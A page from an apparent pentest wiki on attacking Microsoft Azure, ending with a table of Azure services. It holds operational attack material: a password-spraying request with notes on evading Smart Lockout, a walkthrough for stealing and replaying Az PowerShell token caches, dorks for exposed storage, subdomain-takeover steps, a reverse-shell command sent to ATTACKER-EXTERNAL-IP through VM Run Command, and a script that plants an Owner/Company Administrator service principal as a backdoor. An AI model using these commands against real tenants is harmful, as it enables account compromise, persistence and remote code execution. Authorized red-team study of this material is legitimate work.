Pentest Book
Search…
Azure

Basic Info

1
**Tools**
2
https://github.com/dirkjanm/ROADtools
3
https://github.com/dafthack/PowerMeta
4
https://github.com/NetSPI/MicroBurst
5
https://github.com/nccgroup/ScoutSuite
6
https://github.com/hausec/PowerZure
7
https://github.com/fox-it/adconnectdump
8
https://github.com/FSecureLABS/Azurite
9
https://github.com/mburrough/pentestingazureapps
10
https://github.com/Azure/Stormspotter
11
https://github.com/nccgroup/azucar
12
https://github.com/dafthack/MSOLSpray
13
https://github.com/BloodHoundAD/BloodHound
14
https://github.com/nccgroup/Carnivore
15
https://github.com/CrowdStrike/CRT
16
https://github.com/Kyuu-Ji/Awesome-Azure-Pentest
17
https://github.com/cyberark/blobhunter
18
https://github.com/Gerenios/AADInternals
19
20
- Check if company is using Azure AD:
21
https://login.microsoftonline.com/[email protected]&xml=1
22
- If NameSpaceType is "Managed", the company uses Azure AD
23
- Enumerate Azure AD emails
24
https://github.com/LMGsec/o365creeper
25
26
Auth methods:
27
• Password Hash Synchronization
28
◇ Azure AD Connect
29
◇ On-prem service synchronizes hashed user credentials to Azure
30
◇ User can authenticate directly to Azure services like O365 with their internal domain credential
31
• Pass Through Authentication
32
◇ Credentials stored only on-prem
33
◇ On-prem agent validates authentication requests to Azure AD
34
◇ Allows SSO to other Azure apps without creds stored in cloud
35
• Active Directory Federation Services (ADFS)
36
◇ Credentials stored only on-prem
37
◇ Federated trust is setup between Azure and on-prem AD to validate auth requests to the cloud
38
◇ For password attacks you would have to auth to the on-prem ADFS portal instead of Azure endpoints
39
• Certificate-based auth
40
◇ Client certs for authentication to API
41
◇ Certificate management in legacy Azure Service Management (ASM) makes it impossible to know who created a cert (persistence potential)
42
◇ Service Principals can be setup with certs to auth
43
• Conditional access policies
44
• Long-term access tokens
45
◇ Authentication to Azure with oAuth tokens
46
◇ Desktop CLI tools that can be used to auth store access tokens on disk
47
◇ These tokens can be reused on other MS endpoints
48
◇ We have a lab on this later!
49
• Legacy authentication portals
50
51
Recon:
52
• O365 Usage
53
◇ https://login.microsoftonline.com/[email protected]&xml=1
54
◇ https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/[email protected]?Protocol=Autodiscoverv1
55
• User enumeration on Azure can be performed at
56
https://login.Microsoft.com/common/oauth2/token
57
▪ This endpoint tells you if a user exists or not
58
◇ Detect invalid users while password spraying with:
59
▪ https://github.com/dafthack/MSOLSpray
60
◇ For on-prem OWA/EWS you can enumerate users with timing attacks (MailSniper)
61
• Auth 365 Recon:
62
(https://github.com/nyxgeek/o365recon
63
64
Microsoft Azure Storage:
65
• Microsoft Azure Storage is like Amazon S3
66
• Blob storage is for unstructured data
67
• Containers and blobs can be publicly accessible via access policies
68
• Predictable URL’s at core.windows.net
69
◇ storage-account-name.blob.core.windows.net
70
◇ storage-account-name.file.core.windows.net
71
◇ storage-account-name.table.core.windows.net
72
◇ storage-account-name.queue.core.windows.net
73
• The “Blob” access policy means anyone can anonymously read blobs, but can’t list the blobs in the container
74
• The “Container” access policy allows for listing containers and blobs
75
• Microburst https://github.com/NetSPI/MicroBurst
76
◇ Invoke-EnumerateAzureBlobs
77
◇ Brute forces storage account names, containers, and files
78
◇ Uses permutations to discover storage accounts
79
PS > Invoke-EnumerateAzureBlobs –Base
80
81
Password Attacks
82
• Password Spraying Microsoft Online (Azure/O365)
83
• Can spray https://login.microsoftonline.com
84
--
85
POST /common/oauth2/token HTTP/1.1
86
Accept: application/json
87
Content-Type: application/x-www-form-urlencoded
88
Host: login.microsoftonline.com
89
Content-Length: 195
90
Expect: 100-continue
91
Connection: close
92
93
resource=https%3A%2F%2Fgraph.windows.net&client_id=1b730954-1685-4b74-9bfd-
94
dac224a7b894&client_info=1&grant_type=password&username=user%40targetdomain.com&passwor
95
d=Winter2020&scope=openid
96
--
97
• MSOLSpray https://github.com/dafthack/MSOLSpray
98
◇ The script logs:
99
▪ If a user cred is valid
100
▪ If MFA is enabled on the account
101
▪ If a tenant doesn't exist
102
▪ If a user doesn't exist
103
▪ If the account is locked
104
▪ If the account is disabled
105
▪ If the password is expired
106
◇ https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-aadsts-error-codes
107
108
Password protections & Smart Lockout
109
• Azure Password Protection – Prevents users from picking passwords with certain words like seasons, company name, etc.
110
• Azure Smart Lockout – Locks out auth attempts whenever brute force or spray attempts are detected.
111
◇ Can be bypassed with FireProx + MSOLSpray
112
◇ https://github.com/ustayready/fireprox
113
114
Phising session hijack
115
• Evilginx2 and Modlishka
116
◇ MitM frameworks for harvesting creds/sessions
117
◇ Can also evade 2FA by riding user sessions
118
• With a hijacked session we need to move fast
119
• Session timeouts can limit access
120
• Persistence is necessary
121
122
Steal Access Tokens
123
• Azure config files:
124
web.config
125
app.config
126
.cspkg
127
.publishsettings
128
• Azure Cloud Service Packages (.cspkg)
129
• Deployment files created by Visual Studio
130
• Possible other Azure service integration (SQL, Storage, etc.)
131
• Look through cspkg zip files for creds/certs
132
• Search Visual Studio Publish directory
133
\bin\debug\publish
134
• Azure Publish Settings files (.publishsettings)
135
◇ Designed to make it easier for developers to push code to Azure
136
◇ Can contain a Base64 encoded Management Certificate
137
◇ Sometimes cleartext credentials
138
◇ Open publishsettings file in text editor
139
◇ Save “ManagementCertificate” section into a new .pfx file
140
◇ There is no password for the pfx
141
◇ Search the user’s Downloads directory and VS projects
142
• Check %USERPROFILE&\.azure\ for auth tokens
143
• During an authenticated session with the Az PowerShell module a TokenCache.dat file gets generated in the %USERPROFILE%\.azure\ folder.
144
• Also search disk for other saved context files (.json)
145
• Multiple tokens can exist in the same context file
146
147
Post-Compromise
148
• What can we learn with a basic user?
149
• Subscription Info
150
• User Info
151
• Resource Groups
152
• Scavenging Runbooks for Creds
153
• Standard users can access Azure domain information and isn’t usually locked down
154
• Authenticated users can go to portal.azure.com and click Azure Active Directory
155
• O365 Global Address List has this info as well
156
• Even if portal is locked down PowerShell cmdlets will still likely work
157
• There is a company-wide setting that locks down the entire org from viewing Azure info via cmd line: Set-MsolCompanySettings – UsersPermissionToReadOtherUsersEnabled $false
158
159
Azure: CLI Access
160
• Azure Service Management (ASM or Azure “Classic”)
161
◇ Legacy and recommended to not use
162
• Azure Resource Manager (ARM)
163
◇ Added service principals, resource groups, and more
164
◇ Management Certs not supported
165
• PowerShell Modules
166
◇ Az, AzureAD & MSOnline
167
• Azure Cross-platform CLI Tools
168
◇ Linux and Windows client
169
170
Azure: Subscriptions
171
• Organizations can have multiple subscriptions
172
• A good first step is to determine what subscription you are in
173
• The subscription name is usually informative
174
• It might have “Prod”, or “Dev” in the title
175
• Multiple subscriptions can be under the same Azure AD directory (tenant)
176
• Each subscription can have multiple resource groups
177
178
Azure User Information
179
• Built-In Azure Subscription Roles
180
◇ Owner (full control over resource)
181
◇ Contributor (All rights except the ability to change permissions)
182
◇ Reader (can only read attributes)
183
◇ User Access Administrator (manage user access to Azure resources)
184
• Get the current user’s role assignement
185
PS> Get-AzRoleAssignment
186
• If the Azure portal is locked down it is still possible to access Azure AD user information via MSOnline cmdlets
187
• The below examples enumerate users and groups
188
PS> Import-Module MSOnline
189
PS> Connect-MsolService
190
Or
191
PS> $credential = Get-Credential
192
PS> Connect-MsolService -Credential $credential
193
194
PS> Get-MSolUser -All
195
PS> Get-MSolGroup –All
196
PS> Get-MSolGroupMember –GroupObjectId
197
PS> Get-MSolCompanyInformation
198
• Pipe Get-MSolUser –All to format list to get all user attributes
199
PS> Get-MSolUser –All | fl
200
201
Azure Resource Groups
202
• Resource Groups collect various services for easier management
203
• Recon can help identify the relationships between services such as WebApps and SQL
204
PS> Get-AzResource
205
PS> Get-AzResourceGroup
206
PS> Get-AzStorageAccount
207
Azure: Runbooks
208
• Azure Runbooks automate various tasks in Azure
209
• Require an Automation Account and can contain sensitive information like passwords
210
PS> Get-AzAutomationAccount
211
PS> Get-AzAutomationRunbook -AutomationAccountName -ResourceGroupName
212
• Export a runbook with:
213
PS> Export-AzAutomationRunbook -AutomationAccountName -ResourceGroupName -Name -OutputFolder .\Desktop\
214
215
Azure VMs:
216
PS> Get-AzVM
217
PS> $vm = Get-AzVM -Name "VM Name"
218
PS> $vm.OSProfile
219
PS> Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1
220
221
Azure Virtual Networks:
222
PS> Get-AzVirtualNetwork
223
PS> Get-AzPublicIpAddress
224
PS> Get-AzExpressRouteCircuit
225
PS> Get-AzVpnConnection
226
227
# Quick 1-liner to search all Azure AD user attributes for passwords after auth'ing with Connect-MsolService:
228
$x=Get-MsolUser;foreach($u in $x){$p = @();$u|gm|%{$p+=$_.Name};ForEach($s in $p){if($u.$s -like "*password*"){Write("[*]"+$u.UserPrincipalName+"["+$s+"]"+" : "+$u.$s)}}}
229
230
# https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html
231
232
# Removing Azure services
233
- Under Azure Portal -> Resource Groups
234
235
# Interesting metadata instance urls:
236
http://169.254.169.254/metadata/v1/maintenance
237
http://169.254.169.254/metadata/instance?api-version=2017-04-02
238
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
Copied!

Traditional AD - Azure AD comparision

Basic Azure AD concepts and tips

1
- Source of authentication for Office 365, Azure Resource Manager, and anything else you integrate with it.
2
3
- Powershell interaction:
4
• MSOnline PowerShell module
5
• Focusses on Office 365
6
• Some Office 365 specific features
7
• AzureAD PowerShell module
8
• General Azure AD
9
• Different feature set
10
• Azure CLI / Az powershell module
11
• More focus on Azure Resource Manager
12
13
- Azure AD principals
14
• Users
15
• Devices
16
• Applications
17
18
- Azure AD roles
19
• RBAC Roles are only used for Azure Resource Manager
20
• Office 365 uses administrator roles exclusively
21
22
- Azure AD admin roles
23
• Global/Company administrator can do anything
24
• Limited administrator accounts
25
• Application Administrator
26
• Authentication Administrator
27
• Exchange Administrator
28
• Etc
29
• Roles are fixed
30
31
- Azure AD applications
32
• Documentation unclear
33
• Terminology different between documentation, APIs and Azure portal
34
• Complex permission system
35
• Most confusing part
36
• Examples:
37
• Microsoft Graph
38
• Azure Multi-Factor Auth Client
39
• Azure Portal
40
• Office 365 portal
41
• Azure ATP
42
• A default Office 365 Azure AD has about 200 service principals
43
(read: applications)
44
- App permissions
45
• Two types of privileges:
46
• Delegated permissions
47
• Require signed-in user present to utilize
48
• Application permissions
49
• Are assigned to the application, which can use them at any time
50
• These privileges are assigned to the service principal
51
• Every application defines permissions
52
• Can be granted to Service Principals
53
• Commonly used:
54
• Microsoft Graph permissions
55
• Azure AD Graph permissions
56
57
- Azure AD Sync Account
58
• Dump all on-premise password hashes (if PHS is enabled)
59
• Log in on the Azure portal (since it’s a user)
60
• Bypass conditional access policies for admin accounts
61
• Add credentials to service principals
62
• Modify service principals properties
63
64
If password hash sync is in use:
65
Compromised Azure AD connect Sync account = Compromised AD
66
67
• Encryption key is encrypted with DPAPI
68
• Decrypted version contains some blob with AES keys
69
• Uses AES-256 in CBC mode
70
71
Anyone with control over Service Principals can assign credentials to them and potentially escalate privileges.
72
73
Anyone who can edit properties* of the AZUREADSSOACC$ account, can impersonate any user in Azure AD using Kerberos (if no MFA)
74
Copied!

Azure attacks examples

1
# Password spraying
2
https://github.com/dafthack/MSOLSpray/MSOLSpray.ps1
3
Create a text file with ten (10) fake users we will spray along with your own user account ([email protected] ). (Do not spray accounts you do not own. You may use my domain “glitchcloud.com” for generating fake target users) and save as userlist.txt
4
5
Import-Module .\MSOLSpray.ps1
6
Invoke-MSOLSpray -UserList .\userlist.txt -Password [the password you set for your test account]
7
8
# Access Token
9
10
PS> Import-Module Az
11
PS> Connect-AzAccount
12
or
13
PS> $credential = Get-Credential
14
PS>Connect-AzAccount -Credential $credential
15
16
PS> mkdir C:\Temp
17
PS> Save-AzContext -Path C:\Temp\AzureAccessToken.json
18
PS> mkdir “C:\Temp\Live Tokens”
19
20
# Auth
21
Connect-AzAccount
22
## Or this way sometimes gets around MFA restrictions
23
$credential = Get-Credential
24
Connect-AzAccount -Credential $credential
25
26
Open Windows Explorer and type %USERPROFILE%\.Azure\ and hit enter
27
• Copy TokenCache.dat & AzureRmContext.json to C:\Temp\Live Tokens
28
• Now close your authenticated PowerShell window!
29
30
Delete everything in %USERPROFILE%\.azure\
31
• Start a brand new PowerShell window and run:
32
PS> Import-Module Az
33
PS> Get-AzContext -ListAvailable
34
• You shouldn’t see any available contexts currently
35
36
• In your PowerShell window let’s manipulate the stolen TokenCache.dat and AzureRmContext.json files so we can import it into our PowerShell session
37
38
PS> $bytes = Get-Content "C:\Temp\Live Tokens\TokenCache.dat" -Encoding byte
39
PS> $b64 = [Convert]::ToBase64String($bytes)
40
PS> Add-Content "C:\Temp\Live Tokens\b64-token.txt" $b64
41
42
• Now let’s add the b64-token.txt to the AzureRmContext.json file.
43
• Open the C:\Temp\Live Tokens folder.
44
• Open AzureRmContext.json file in a notepad and find the line near the end of the file title “CacheData”. It should be null.
45
• Delete the word “null” on this line
46
• Where “null” was add two quotation marks (“”) and then paste the contents of b64-token.txt in between them.
47
• Save this file as C:\Temp\Live Tokens\StolenToken.json
48
• Let’s import the new token
49
50
PS> Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json’
51
52
• We are now operating in an authenticated session to Azure
53
54
PS> $context = Get-AzContext
55
PS> $context.Account
56
57
• You can import the previously exported context (AzureAccessToken.json) the same way
58
59
# Azure situational awareness
60
• GOAL: Use the MSOnline and Az PowerShell modules to do basic enumeration of an Azure account post-compromise.
61
• In this lab you will authenticate to Azure using your Azure AD account you setup. Then, you will import the MSOnline and Az PowerShell modules and try out some of the various modules that assist in enumerating Azure resource usage.
62
63
• Start a new PowerShell window and import both the MSOnline and Az modules
64
PS> Import-Module MSOnline
65
PS> Import-Module Az
66
• Authenticate to each service with your Azure AD account:
67
PS> Connect-AzAccount
68
PS> Connect-MsolService
69
• First get some basic Azure information
70
PS> Get-MSolCompanyInformation
71
• Some interesting items here are
72
◇ UsersPermissionToReadOtherUsersEnabled
73
◇ DirSyncServiceAccount
74
◇ PasswordSynchronizationEnabled
75
◇ Address/phone/emails
76
• Next, we will start looking at the subscriptions associated with the account as well as look at the current context we are operating in. Look at the “Name” of the subscription and context for possible indication as to what it is associated with.
77
PS> Get-AzSubscription
78
PS> $context = Get-AzContext
79
PS> $context.Name
80
PS> $context.Account
81
• Enumerating the roles assigned to your user will help identify what permissions you might have on the subscription as well as who to target for escalation.
82
PS> Get-AzRoleAssignment
83
• List out the users on the subscription. This is the equivalent of “net users /domain” in on-prem AD
84
PS> Get-MSolUser -All
85
PS> Get-AzAdApplication
86
PS> Get-AzWebApp
87
PS> Get-AzSQLServer
88
PS> Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName
89
PS> Get-AzSqlServerFirewallRule –ServerName $ServerName -ResourceGroupName $ResourceGroupName
90
PS> Get-AzSqlServerActiveDirectoryAdminstrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName
91
• The user you setup likely doesn’t have any resources currently associated with it, but these commands will help to understand the specific resources a user you gain access to has.
92
PS> Get-AzResource
93
PS> Get-AzResourceGroup
94
• Choose a subscription
95
PS> Select-AzSubscription -SubscriptionID "SubscriptionID"
96
• There are many other functions.
97
• Use Get-Module to list out the other Az module groups
98
• To list out functions available within each module use the below command substituting the value of the “Name” parameter.
99
PS> Get-Module -Name Az.Accounts | Select-Object -ExpandProperty ExportedCommands
100
PS> Get-Module -Name MSOnline | Select-Object -ExpandProperty ExportedCommands
Copied!

Azure Block Blobs (S3 equivalent) attacks

1
# Discovering with Google Dorks
2
site:*.blob.core.windows.net
3
site:*.blob.core.windows.net ext:xlsx | ext:csv "password"
4
# Discovering with Dns enumeration
5
python dnscan.py -d blob.core.windows.net -w subdomains-100.txt
6
7
# When you found one try with curl, an empty container respond with 400
8
9
# List containers
10
az storage container list --connection-string '<connection string>'
11
# List blobs in containers
12
az storage blob list --container-name <container name> --connection-string '<connection string>'
13
# Download blob from container
14
az storage blob download --container-name <container name> --name <file> --file /tmp/<file> --connection-string '<connection string>'
Copied!

Azure subdomain takeovers

1
# Azure CloudApp: cloudapp.net
2
1 Check CNAME with dig pointing to cloudapp.net
3
2 Go to https://portal.azure.com/?quickstart=True#create/Microsoft.CloudService
4
3 Register unclaimed domain which CNAME is pointing
5
6
7
# Azure Websites: azurewebsites.net
8
1 Check CNAME with dig pointing to azurewebsites.net
9
2 Go to https://portal.azure.com/#create/Microsoft.WebSite
10
3 Register unclaimed domain which CNAME is pointing
11
4 Register domain on the Custom domains section of the dashboard
12
13
# Azure VM: cloudapp.azure.com
14
1 Check CNAME with dig pointing to *.region.cloudapp.azure.com
15
2 Registering a new VM in the same region with size Standard_B1ls (cheapest) with 80 and 443 open
16
3 Go to Configuration and set the domain name which CNAME is pointing
Copied!

Other Azure Services

1
# Azure App Services Subdomain Takeover
2
- For target example.com you found users.example.com
3
- Go https://users.galaxybutter.com and got an error
4
- dig CNAME users.galaxybutter.com and get an Azure App Services probably deprecated or removed
5
- Creat an App Service and point it to the missing CNAME
6
- Add a custom domain to the App Service
7
- Show custom content
8
9
# Azure Run Command
10
# Feature that allows you to execute commands without requiring SSH or SMB/RDP access to a machine. This is very similar to AWS SSM.
11
az login
12
az login --use-device-code #Login
13
az group list #List groups
14
az vm list -g GROUP-NAME #List VMs inside group
15
#Linux VM
16
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "id"
17
#Windos VM
18
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunPowerShellScript --scripts "whoami"
19
# Linux Reverse Shell Azure Command
20
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "bash -c \"bash -i >& /dev/tcp/ATTACKER-EXTERNAL-IP/9090 0>&1\""
21
22
# Azure SQL Databases
23
- MSSQL syntaxis
24
- Dorks: "database.windows.net" site:pastebin.com
25
26
# Azure AD commands
27
az ad sp list --all
28
az ad app list --all
29
30
# Azure metadata service
31
http://169.254.169.254/metadata/instance
32
https://github.com/microsoft/azureimds
Copied!

Create Azure service principal as backdoor

1
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
2
$spn
3
$BSTR = ::SecureStringToBSTR($spn.Secret)
4
$UnsecureSecret = ::PtrToStringAuto($BSTR)
5
$UnsecureSecret
6
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
7
$role = Get-MsolRole -RoleName "Company Administrator"
8
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -
9
RoleMemberObjectId $sp.ObjectId
10
#Enter the AppID as username and what was returned for $UnsecureSecret as the password
11
in the Get-Credential prompt
12
$cred = Get-Credential
13
Connect-AzAccount -Credential $cred -Tenant “tenant ID" -ServicePrincipal
Copied!

Azure password reset

Azure Services Summary

Base services
Azure Service
Could be Called
Use this to...
Like AWS...
Virtual Machines
Servers
Move existing apps to the cloud without changing them. You manage the entire computer.
EC2
Cloud Services
Managed Virtual Machines
Run applications on virtual machines that you don't have to manage, but can partially manage.
Batch
Azure Distributed Processing
Work on a large chunk of data by divvying it up between a whole bunch of machines.
RemoteApp
Remote Desktop for Apps
Expose non-web apps to users. For example, run Excel on your iPad.
AppStream
Web Apps
Web Site Host
Run websites (.NET, Node.js, etc.) without managing anything extra. Scale automatically and easily.
Elastic Beanstalk
Mobile Apps
Mobile App Accelerator
Quickly get an app backend up and running.
Logic Apps
Visio for Doing Stuff
Chain steps together to get stuff done.
API Apps
API Host
Host your API's without any of the management overhead.
API Management
API Proxy
Expose an API and off-load things like billing, authentication, and caching.
API Gateway
Mobile
Azure Service
Could be Called
Use this to...
Like AWS...
Notification Hubs
Notification Blaster
Send notifications to all of your users, or groups of users based on things like zip code. All platforms.
SNS
Mobile Engagement
Mobile Psychic
Track what users are doing in your app, and customize experience based on this data.
Storage
Azure Service
Could be Called
Use this to...
Like AWS...
SQL Database
Azure SQL
Use the power of a SQL Server cluster without having to manage it.
RDS
Document DB
Azure NoSQL
Use an unstructured JSON database without having to manage it.
Dynamo DB
Redis Cache
Easy Cache
Cache files in memory in a scalable way.
Elasticache
Storage Blobs
Cloud File System
Store files, virtual disks, and build other storage services on top of.
S3
Azure Search
Index & Search
Add search capabilities to your website, or index data stored somewhere else.
CloudSearch
SQL Data Warehouse
Structured Report Database
Store all of your company's data in a structured format for reporting.
RedShift
Azure Data Lake
Unstructured Report Database
Store all of your company's data in any format for reporting.
HDInsight
Hosted Hadoop
Do Hadoopy things with massive amounts of data.
Machine Learning
Skynet
Train AI to predict the future using existing data. Examples include credit card fraud detection and Netflix movie recommendations.
Stream Analytics
Real-time data query
Look for patterns in data as it arrives.
Data Factory
Azure ETL
Orchestrate extract, transform, and load data processes.
Data Pipeline
Event Hubs
IoT Ingestor
Ingest data at ANY scale inexpensively.
Networking
Azure Service
Could be Called
Use this to...
Like AWS...
Virtual Network
Private Network
Put machines on the same, private network so that they talk to each other directly and privately. Expose services to the internet as needed.
ExpressRoute
Fiber to Azure
Connect privately over an insanely fast pipe to an Azure datacenter. Make your local network part of your Azure network.
Direct Connect
Load Balancer
Load Balancer
Split load between multiple services, and handle failures.
Traffic Manager
Datacenter Load Balancer
Split load between multiple datacenters, and handle datacenter outages.
DNS
DNS Provider
Run a DNS server so that your domain names map to the correct IP addresses.
Route53
VPN Gateway
Virtual Fiber to Azure
Connect privately to an Azure datacenter. Make your local network part of your Azure network.
Application Gateway
Web Site Proxy
Proxy all of your HTTP traffic. Host your SSL certs. Load balance with sticky sessions.
CDN
CDN
Make your sites faster and more scalable by putting your static files on servers around the world close to your end users.
Cloudfront
Media Services
Video Processor
Transcode video and distribute and manage it on the scale of the Olympics.
Elastic Transcoder
Management
Azure Service
Could be Called
Use this to...
Like AWS...
Azure Resource Manager
Declarative Configuration
Define your entire Azure architecture as a repeatable JSON file and deploy all at once.
CloudFormation
Developer
Azure Service
Could be Called
Use this to...
Like AWS...
Application Insights
App Analytics
View detailed information about how your apps (web, mobile, etc.) are used.
Mobile Analytics
Service Fabric
Cloud App Framework
Build a cloud optimized application that can scale and handle failures inexpensively.
Last modified 5mo ago